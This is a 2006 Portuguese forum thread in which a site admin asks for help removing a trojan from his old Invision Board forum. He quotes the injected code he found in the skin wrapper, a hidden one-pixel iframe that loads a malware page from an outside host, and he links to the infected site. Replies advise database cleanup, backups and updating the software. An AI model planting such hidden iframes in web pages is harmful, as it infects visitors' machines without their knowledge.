1. Este site usa cookies. Ao continuar a usar este site está a concordar com o nosso uso de cookies. Saber Mais.

Download.Trojan

Discussão em 'Dúvidas e Suporte—Internet, Redes, Segurança' iniciada por Neojag, 4 de Junho de 2006. (Respostas: 3; Visualizações: 755)

  1. Neojag

    Neojag Power Member

    Tenho este bicho a espalhar-se através um fórum que corro (uma versão relativamente antiga do invision board, confesso que a culpa é minha mas nunca mais tive paciência para fazer o update desde que o software começou a ser pago ;)), e não faço ideia de como é que a message board ficou infectada nem como remover esta treta de lá (e já andei a fuçar pelo google um bom bocado!)
    Antivírus como o Symantec detectam a ameça e param-na com definições de vírus recentes. Em máquinas não protegidas e se for aberto com ie, este saca automaticamente o trojan que é infectado e manda vir mais uns 5 ou 6 trojans. Com o firefox, é pedido para sacar o ficheiro.

    Agradecia ajuda neste caso, já que não consigo nem por nada remover a coisa. Já andei a passar a vista nas fontes do fórum e não consigo encontrar nada relativa ao trojan.

    Para os que quiserem ver:

    ATENÇÃO QUE A PÁGINA ESTÁ INFECTADA, NÃO ABRIR COM IE NEM SEM ANTIVÍRUS ACTUALIZADO: http://tolkienpt.neojag.net

    Agradecido

    Edit: descobri a linha que fazia o link para o trojan, estava enfiada no wrapper do skin em <iframe src='http://traffall.biz/adv/195/new.php' width=1 height=1></iframe>. Bastou comentar que o link para o trojan desapareceu, mas ainda não tenho ideia de como é que terá entrado e parece-me uma solução muito frágil O_O
     
    Última edição: 4 de Junho de 2006
  2. Tomekk

    Tomekk Power Member

    re:

    Limpa os files to site todo...

    Mas o virus pode estar alojado na DB... e ai vai ser um caso complicado limpala....

    E já agora depois da ameaça resolvida nada como actualizar o software da board ou arranjar outro, actualizado.
     
  3. Neojag

    Neojag Power Member

    A questão é como fazer isso sem mandar abaixo a board de vez...
     
  4. Tomekk

    Tomekk Power Member

    re:

    Faz uma copia da backup..

    utiliza a copia para retirar descobrir como resolver o problema.. isto se o codigo tiver alojado na db.... | Em seguida, a solução passará sempre por meter a board em baixo, e resolver a questão.

    Como já saberás a receita será uma questão de minutos.
     

Partilhar esta Página